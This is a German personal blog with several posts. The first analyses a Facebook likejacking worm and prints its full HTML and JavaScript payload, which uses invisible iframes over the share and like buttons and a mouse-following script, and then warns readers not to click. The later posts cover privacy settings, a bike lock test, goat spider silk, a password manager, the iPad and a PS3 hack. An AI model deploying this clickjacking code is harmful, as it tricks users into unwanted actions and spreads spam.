Sowas sehe ich immer häufiger bei Facebook. Ha – klingt interessant, wie?
Das ist allerdings ein Wurm, der sich über Facebook verbreitet. Mal drauf geklickt…

Bäm! Fieser Typ, aha, der Rächer – und was hat er nun mit seiner Exfreundin gemacht?! Der aktuelle Reiter heißt Revenge, das fällt einem gar nicht mehr auf, also mal auf “Click Here To Start” geklickt.

Oh, noch keine Rache – dafür so eine Überprüfung, ob man wirklich ein Mensch ist, jaaaa Mann, das kenne ich von diversen Passwortabfragen und Download-Seiten und so, okeeeeehhh… ich bin doch ein Mensch.

Wenn man aber hier jetzt klickt, löst man aber bereits die zweite Falle aus.

Die erste war schon der gefälschte Link “Click Here To Start”. Das war nämlich kein echter Link, sondern ein verstecktes Script, welches den Inhalt der Seite gegen etwas neues austauscht. Internetbrowser und Facebook sind meistens so sicher, dass sie so etwas nicht von alleine starten, aber sie können nicht verhindern, dass der Benutzer darauf klickt. Grundmechanismen im Internet funktionieren so und das ist auch gut so, aber wenn so wie hier etwas verlockendes versprochen wird, dann ist das äußerst übel.

Das ist also gar kein echter Link, sondern der Startbefehl für ein kleines Programm, welches in der Facebookseite versteckt ist. Das selber macht nicht viel, das weiß Facebook zu verhindern. Aber Facebook kann nicht verhindern, dass das Script auf “Wunsch” des Benutzers von woanders Sachen nachlädt.

Und diese Sachen sehen dann so aus:

<iframe id=”app4949752878_l” src=”ht tp://blablubb.tk/p.php” style=”border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; height: 540px; width: 540px; “></iframe>

Da wird tatsächlich eine kleine Webseite in die Facebook-Webseite reingeladen. Und zwar nicht von Facebook.com oder .de selber sondern von (hier) blablubb.tk (ich habe den echten Link entfernt). Die Style-Angaben bedeuten nur, dass da Rahmen und Scrollbalken und so etwas versteckt wird, damit nicht auffällt, dass dieser kleine Bereich gar nicht mehr von Facebook stammt.

Die Seite, die dann nachgeladen wird, sieht in etwa so aus:

<body> <div style=”z-index:1; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0;opacity: 0.0; position: absolute; left: 120px; top: 180px; background-color: red; width: 150px; padding: 5px; color: white; border: 0px;”> <iframe scrolling=”no” frameborder=”0″ name=”lpcframe” id=”lpcframe” allowtransparency=”true” style=”border: medium none; overflow: hidden; width: 300px; height: 123px;” src=“http://www.facebook.com/plugins/likebox.php?id=146683505374481&amp;width=600&amp;connections=10&amp;stream=true&amp;header=true&amp;height=587″></iframe> </div> <script> var myHTMLBody=(document.compatMode==”CSS1Compat”)? document.documentElement : document.body; var lpcLikeFrame = document.getElementById(‘lpcLikeFrame’); var myBoolean = 0; function mouseFollower(e){ if (window.event) { lpcLikeFrame.style.top = (window.event.y-10)+myHTMLBody.scrollTop+’px’; lpcLikeFrame.style.left = (window.event.x-10)+myHTMLBody.scrollLeft+’px’; } else {lpcLikeFrame.style.top = (e.pageY-10)+’px’; lpcLikeFrame.style.left = (e.pageX-10)+’px’;} } document.onmousemove = function(e) { if (myBoolean == 0) {mouseFollower(e);} else lpcLikeFrame.style.display = ‘none’; } </script> <!— loading SHARE url —> <!— ADD YOUR OWN PAGE URL BELOW —> <div style=”z-index:100; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0;opacity: 0.0; position: absolute; left: -180px; top: -18px; background-color: blue; width: 370px; height:300px; padding: 0px; border: 0px;”> <iframe style=”width:100%; height:300px; border:none” scrolling=”no” src=”http://www.facebook.com/sharer.php?u=http://www.facebook.com/pages/OMG-This-GUY-Went-A-Little-To-Far-WITH-His-Revenge-On-His-EX-Girlfriend/146683505374481″></iframe> </div> <!— top big layer green button —> <div style=”z-index:101; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0;opacity: 0.0; position: absolute; left: 0px; top: 0px; background-color: green; width: 370px; height:245px; padding: 0px; border: 0px;”></div> <!— before share yellow —> <div style=”z-index:101; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0;opacity: 0.0; position: absolute; left: 0px; top: 245px; background-color: yellow; width: 79px; height:50px; padding: 0px; border: 0px;”></div> <!— before share for design purpose —> <div style=”z-index:101; position: absolute; left: 30px; top: 245px; background-color: #444444; width: 50px; height:25px; padding: 0px; border: 0px;”></div> <!— before share green bottom full —> <div style=”z-index:101; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0;opacity: 0.0; position: absolute; left: 0px; top: 270px; background-color: green; width: 350px; height:50px; padding: 0px; border: 0px;”></div> <!— after share to hide cancel —> <div style=”z-index:101; position: absolute; left: 130px; top: 245px; background-color: #FFC400; width: 60px; height:25px; padding: 0px; border: 0px;”></div> <!— after like second —> <div style=”z-index:101; position: absolute; left: 295px; top: 245px; background-color: green; width: 60px; height:25px; padding: 0px; border: 0px;”></div> <!— after like first —> <div style=”z-index:101; position: absolute; left: 235px; top: 245px; background-color: #7A3DB8; width: 60px; height:25px; padding: 0px; border: 0px;”></div> <!— SHARE button Blue —> <div style=”z-index:-101; position: absolute; left: 79px; top: 245px; background-color: red; width: 60px; height:25px; padding: 0px; border: 0px;”></div> <!— Like Button Blue —> <div style=”z-index:-101; position: absolute; left: 190px; top: 245px; background-color: blue; width: 45px; height:25px; padding: 0px; border: 0px;”></div> <!– <img src=”http://i48.tinypic.com/309t1u9.jpg” border=0″> —> <img style=”margin-left:15px;” src=”http://i49.tinypic.com/15q6gza.jpg” border=”0″> </body>

Ich habe mal ein paar Sachen im Code markiert.
Opacitys – gaaanz, gaaaanz viele verschiedene, damit auch alle verschiedenen Browser kontrolliert werden können. Und alle auf “0″ oder “0.0″ gesetzt. Opacity ist “Sichtbarkeit” und mit “0″ ist das gewünschte Element einfach unsichtbar. Es werden also einige Elemente wieder versteckt.
Facebook-URLs wie sharer.php und likebox.php – gepaart mit Javascript-Code und alle innerhalb der mittels Opacity versteckten Elemente. Hmmm… warum Facebook-Seiten verstecken?
ADD YOUR OWN PAGE URL BELOW – Oh, der Code stammt noch nicht mal von dem Arschloch selber, sondern den hat er sich auch nur irgendwo her kopiert und dann die Anleitung im Text befolgt.
Alles darunter ist nur Scheincode, der die bunten Felder darstellt, die machen gar nix. Aber darüber liegen die versteckten Facebookseiten und bei einem Klick auf die bunten Klötze klickt man tatsächlich auf die Facebook-Buttons. Auf Gefällt mir beispielsweise. Und dann sehen deine Freunde, dass dir das gefällt und klicken selber drauf.

So verbreitet sich der Wurm dann.

Diese bestimmte Seite gerade dient vermutlich nur dazu, dir Werbung zu zeigen, aber es kann auch sehr gut sein, dass über die versteckten Fenster Viren oder so etwas auf deinen PC geladen werden.

Also: NICHT EINFACH ÜBERALL DRAUF KLICKEN!!!

Eine Möglichkeit, wie man überprüfen kann, ob das Verarsche ist: einfach mal auf die “Wall” des tollen Produkts klicken.

Da beschwert sich jemand. Vor 11 Sekunden. Die Beschwerden werden aber ständig gelöscht, man kann minütlich nachgucken und die Einträge auf der Wall sehen anders aus.

…in den USA zumindestens. Und du kannst Facebook sagen, wo du gerade bist. In den USA und per iPhone zumindestens.

Allerdings wird das ganze auch nach Deutschland und auf andere Telefone kommen, das ist so sicher wie Bielefeld in Google Streetview. Die deutschen Privatssphäre-Einstellungen sind schon angepasst worden, darum hurtig dorthin und das ganze vorsorglich anpassen:

Dies ist die URL zu *deinen* Facebook-Privatsphäre-Einstellungen – wenn du dort noch nichts angepasst hast, wird es nun aber Zeit.
Uns interessiert aber grad nur der Punkt “Orte” – über “Benutzerdefinierte Einstellungen” kannst du für viele verschiedene Punkte einstellen, wer was sehen oder dürfen darf. Zum neuen “Orte”-Feature zählen drei Punkte:

• Unter Dinge, die ich teile der Punkt “Orte, an denen ich mich befinde” – wer darf in deinem Profil sehen, an welchem Ort du dich gerade befindest.
• Ebenfalls unter Dinge, die ich teile und für manche eher unangenehm: “Mich im „Personen, die jetzt hier sind“-Abschnitt anzeigen nachdem ich angegeben habe, wo ich mich befinde” – damit bekommen alle Personen, die einen Facebook-Ort betrachten angezeigt, dass du dich dort gerade aufhältst. Mehr Informationen bekommen sie aber nicht, sie sehen danach nur dein normales Facebook-Profil (welches du hoffentlich bereits so eingestellt hast, dass nicht jede x-beliebige Person alles sehen kann, richtig?)
• Unter Dinge, die andere Personen teilen der wichtigste/schlimmste Punkt: “Freunde können angeben, dass ich mich an einem Ort befinde” – bedeutet, dass dich deine Facebook-Freunde bei Facebook-Orten einchecken können. Will man wohl am liebsten deaktiviert haben, richtig?
  Hier ein “Gesperrt”  einzustellen bedeutet nicht, dass man selber nicht mehr einchecken kann – aber du bist die einzige Person, die das dann kann.

Mich verwirrt der letzte Punkt… ich habe das natürlich deaktiviert. Kann ja gut sein, dass ein bloßes Erwähnen im Facebook-Status zum Fremd-Einchecken reicht… “Ich bin @Media Markt Weserpark (hier würde Facebook das als Ort erkennen und dich dort einchecken) mit @Marius Kallhardt (und mich als Person und schwupps bin ich ebenfalls eingecheckt)” – lieber nicht so.

Ich bin mal wieder am Essen testen für TRND, diesmal Aufbackbaguettes von *trommelwirbelgefiedelsetztein* Kerrygold Aufback-Baguettes.

Quasi nun mal Marke bei die Grillsession und was mit Namen in den Ofen.

Ofen da, Grill da, Fleisch kann ich schnell auftauen… aber wo sind die Baguettes?!
Rewe hat se nicht. Netto hat se nicht. ALDI hab ich gar nicht erst geguckt, aber Real – RE-motherfucking-AL, die sonst ALLES haben, weil man ja nur EINMAL hin muss – die haben se auch nicht.

Und ich krieg heute ne Mail, dass ich noch eine Woche habe, um die Coupons einzuschicken, damit ich meine Spesen zurückkriege. Okay…

Letzte Chance jetzt: Combi. Halbe Weltreise, aber was tut man nicht alles für Aufbackbackbackback-Zeug.

Mir ist vor ein oder zwei Wochen wieder mal ein Schloss kaputt gegangen.
Diesmal das Austauschschloss, bei dem ich nach vielleicht etwas zu unsanfter Behandlung den Schließmechanismus als feines Puzzle (!!) auf den Küchentisch streuen konnte. Austauschschloss, weil die Firma Ecotec mir kulanterweise ein neues Schloss geschickt hat – beim Schloss davor hatte sich ebenfalls der Schließmechanismus aufgelöst.

Vielleicht sollte das Schloss selber an der Stelle etwas  stabiler sein. Durch die Bauweise (ein Stahlband, durch das ein Stahlkabel durchgewoben ist) ist das Schloss selber ständig unter Spannung und das drückt auf das Schlossschloss. Zusätzlich ist das Schloss dort nicht gerade stabil. :/

Egal, blöd, aber nicht unbedingt soooooo schlimm, wenn das Schloss wenigstens schwer zu durchtrennen ist. Ecotec bietet nicht nur dieses Schloss mit seinem fragilen Schloss an, sondern auch Bänder nach dem gleichen Prinzip, das wäre ja noch was, ich müsste nur ein ordentliches Schloss dafür kaufen.

Der Sekundendiebstahl, beim Rundschloss aus Stahlkabel ein alltäglicher Vorgang, ist [..] mit dem Flachbandschloss nicht möglich.

- Ecotec

Ein kaputtes Schloss hatte ich nun hier, also hab ich es mal testen lassen. Ich bin eben nach der Arbeit zu Fahrradfeinkost gefahren, eine Fahrradwerkstatt wird wohl auch Aufschneidewerkzeug haben, vermutlich schwereres, als die kleine Zange, die hier in meinem Werkzeugkasten liegt. Mindestens einen großen Bolzenschneider.
Gesagt getan, in der Werkstatt griff der Meister erst zu einem normalen Seitenschneider und setzte an…

2 Schnitte, die Dame an der anderen Werkbank konnte ihren Satz nicht beenden, der mit “Wenn du das nicht schaffst, dann nimm doch meine…” begann.

Beide schmunzelten und ich sagte ehrlich, dass ich mit mehr Widerstand gerechnet hätte.

Der Chef hatte das wohl auch gehört und kam nach hinten: “War das ein Schloss?”

Der Meister: “Nö.”

Eingepackt und wieder aufs Rad (vorher das Bügelschloss gelöst). Also gut, nix mit Ecotec-Band und ordentlichem Schloss – die Schlösser sind zwar sehr praktisch, aber wenn man die Dinger mit Hosentaschenwerkzeug aufbekommt… wird es wohl doch was anderes werden.

Amerikanische Wissenschaftler… haben einer weiblichen Ziege bestimmte Spinnen-Gene eingepflanzt, so dass ihre Milch nun das Protein enthält, aus welchem Spinnen ihre (nichtklebrigen) Netz-Haltefäden spinnen.

After the milk is collected, it’s taken back to a laboratory where the silk protein is filtered out. It solidifies when exposed to air and is wound onto a roller.

Prof Lewis said the team collects about four metres of silk for every four drops of protein they gather.

The pure material had a wide range of medicinal applications as sutures and binding agents – including ligament replacement – but its use could extend well beyond our hospitals.

“If it works, frankly one of the first applications is maybe fishing line,” Prof Lewis said.

Quelle: News.com.au

Hört sich bescheuert an, funktioniert aber tatsächlich. Professor Randy Lewis forscht an der University of Wyoming und seine “Ziegenseide” hat eine eigene Homepage. Dort spricht Prof. Lewis gleich die Eigenschaften von Spinnenseide an: “Stärker als Kevlar, elastischer als Nylon”.

Hmmm, Kevlar? Könnte das nicht fürs Verteidigungsministerium interessant sein?
Jupp:

April 4, 2003 — University of Wyoming scientists have been awarded grants from the U.S. Department of Defense (DoD) to perform research in science and engineering fields important to national defense.

Quelle: UW Researchers Receive Grants for National Defense Projects

Klingt irgendwie nach Hollywood…

…ich habe hier einen laaangen Blogeintrag in der Entwurfspipe liegen, in dem ich die total tolle Passwortspeicherseite Clipperz.com lobe. Clipperz wirkt durch Animationen (rumfliegende Passwortboxen und Statusmeldungen) ein wenig Spielzeughaft, ist aber eigentlich eine klasse und sichere Sache:

• Ich speichere dort meine wichtigsten Passwörter: alle FTP-Passwörter, denn die musste ich nach dem letzten WordPress-Hack auf irgendwas verdammt kryptisches ändern; Facebook, Twitter, meinVZ, na klar; Google – was ich alles über Google mache, da kann ich wirklich nicht mein Standardpasswort nehmen; ein paar PINs etwa für Cambio und Packstation; whatever.
• Diese Passwörter sind alle vom Format !”§I$JT&”§ASF (kein echtes Passwort) und ich kann mir die nie merken – dafür aber das eine Passwort, mit dem ich an die alle rankomme – für meinen Clipperz-Zugang. Das ist etwas einfacher, aber immer noch mit Sonderzeichen, GROSS- und kleinschreibung. Also sicherer als Haustiergeburtstag.
• Manche, etwa Google, kann ich mir auch so merken, weil ich die ständig eingebe. Für die anderen muss ich diesen drei-vier-Klicks-Umweg nehmen… dafür habe ich dort ein ziemlich sicheres Passwort, das man mir auch ruhig kurz klauen kann, denn ich benutze es nirgendwo anders.
• Zur Beschleunigung gibt es Direktlogins – Clipperz entschlüsselt die eingegebenen Daten und loggt einen automatisch auf der gewünschten Seite ein, so muss man gar nicht erst das Passwort markieren, kopieren und wieder einfügen (das entschlüsselte Passwort ist sowie nur auf Wunsch sichtbar – falls da mal jmd hinter einem steht).
• Für ganz paranoide in chinesischen Internetcafés lassen sich Einmalsätze speichern, die für ein einmaliges Login gut sind – so verrät man sein Masterpasswort nicht.
• Und für den Notfall kann sein persönliches Backup der kompletten Seite runterladen, welches den Entschlüsselungsalgorithmus beinhaltet, so dass man auch offline mit seinem Zugangspasswort an alle anderen Passwörter rankommt.

Ich find die Seite dermaßen klasse, dass ich denen neulich ein paar Euros gespendet habe.

Und nun?? Nun (4:00 Uhr morgens oder so) will ich an meinen Facebook-Account und die Seite von denen ist down. Tolle Wurst. :/
Mein letztes Datenbank-Backup ist leider von Mitte Januar, da ist das aktuelle Facebook-Passwort noch nicht drin. Tolle Wurst = Ich. -.-

Naja, was solls, um meine blöde Farm kann ich mich auch später kümmern – eigentlich sollte ich sowieso pennen.

…durch irgendein Sync-Vermassel meinerseits bekam ich plötzlich SUPPORT-KUNDEN als Facebook-Kontakte vorgeschlagen. Einerseits ganz witzig, einen Typen, den ich sonst nur als Email-Kontakt irgendwo in den USA kannte, mit seinem Kopf in einem Pranger stecken sehen.

Weniger schön allerdings, dass die mich andersrum wohl auch sehen konnten.

Über die Freunde-Vorschlagseite konnte ich dann noch mehr Leute sehen, mit denen ich irgendwann mal Email-Kontakt hatte… unter anderem die Frau, deren Bett ich übers Schwarze Brett von Bremen.de erstanden hatte – HALLO?!

Facebook scheint also doch ab und an mal wieder nachzugucken, ob ich neue Adressen in meinem Google-Adressbuch hab, ich habe nun die Verknüpfung zu Google gelöscht und hier ist auch noch ein Link über den mal die importierten Email-Daten bei Facebook rauslöschen kann:

Facebook verwendet die E-Mail-Adressen, die du mithilfe des Freundefinders hochlädst, um dir dabei zu helfen mit deinen Freunden in Verbindung zu treten. Zudem verwendet Facebook diese Informationen, um dir und deinen Kontakten auf Facebook Nutzer und Seiten vorzuschlagen. Bitte klicke auf „Entfernen“, wenn du diese Kontakte entfernen möchtest. Beachte, dass es etwas dauern kann bis dein Name vollständig aus dem „Vorschläge“-Abschnitt entfernt wurde.

-> http://www.facebook.com/contact_importer/remove_uploads.php

…weil das erste. Ist das iPad. Hier ein Bild, von der Produktseite bei Apple geklaut:

Datengewichse: 1GHz Prozessor von Apple selber, zwischen 16 und 64 GB Speicher, WLAN, Highend-Modelle auch mit UMTS. 10 Stunden Akkulaufzeit oder einen Monat Standby. Die UMTS-Modelle werden “unlocked” sein, man kann also auch seine Simyo-Karte reinstöpseln – für die USA gibt es auch Handyverträge (ohne Mindestlaufzeit), für Deutschland könnte sowas auch kommen.

Preise beginnen bei 499 USD und gehen bis 829 USD hoch. Euro-Preise werden wohl ähnlich sein, die Platten wird’s ab März zu kaufen geben.

Tja… und das wars mit den tollen Sachen.
Was ich ganz nett finde sind die angepassten Apps eben direkt für so ein Format, also für ein rumschleppbares Touch-Display. Die Anwendung der New York Times ist da schon ganz vorne. Auch Film und Fotos auf einem angenehmeren Gerät als einem Monitor oder Laptopbildschirm angucken, das würde mir gefallen. Und ein richtiges Internet… ja, *das* wärs.

Leider kann das iPad kein richtiges Internet. Flash fehlt. Kein FarmVille, keine sonstigen Flash-Spiele.
Dafür gibt es einen neuen Bücherladen, der aber sicherlich nicht die Bücherwelt umkrempeln wird, wie es der iTunes-Store vor ein paar Jahren getan hat.

Es mag (hoffentlich) so sein, dass es richtige große Apps geben wird, vielleicht etwas mit dem man Bilder bearbeiten kann… wie geht es eigentlich PowerTool-Kai?? Macht mir doch mal sowas… dann könnte man mit dem Ding auch mehr anfangen. Aber so ist es echt nur ein iPhone in groß, d.h. Zwischendurchunterhaltung für nicht nur zwischendurch. Daher bitte auch nicht-nur-zwischendurch-Apps…

Aber mal abwarten, klasse ist, dass “der Markt” nun mal einen ordentliche Richtung vorgegeben bekommen hat. Ich werd aber auf eine zweite Revision warten…

PS3 zum ersten Mal gehackt (Entwicklerblog). Bislang kann schon Fremdcode ausgeführt werden, aber noch ist keine der weiteren Sicherheitsvorkehrungen wie die Dechiffrierschlüssel für Spiele oder die des Blu-Ray-Laufwerkes ausgelesen worden.

However, Sony’s attempts to secure the game delivery system and the Blu-ray drive itself mean that there’d still be a huge reverse-engineering job required to enable piracy. While PS3 might well be hacked today on a low-level, further levels of protection remain in place to prevent copying games, and will require a significant effort in terms of reverse-engineering to overcome. Those expecting working PS3 games to appear on torrents in the next days or weeks are going to be disappointed.

via PS3: Hacked | DigitalFoundry.

(Ist natürlich nur eine Frage der Zeit… gib unendlich vielen Chinesen Schimpansen unendlich viel Zeit…)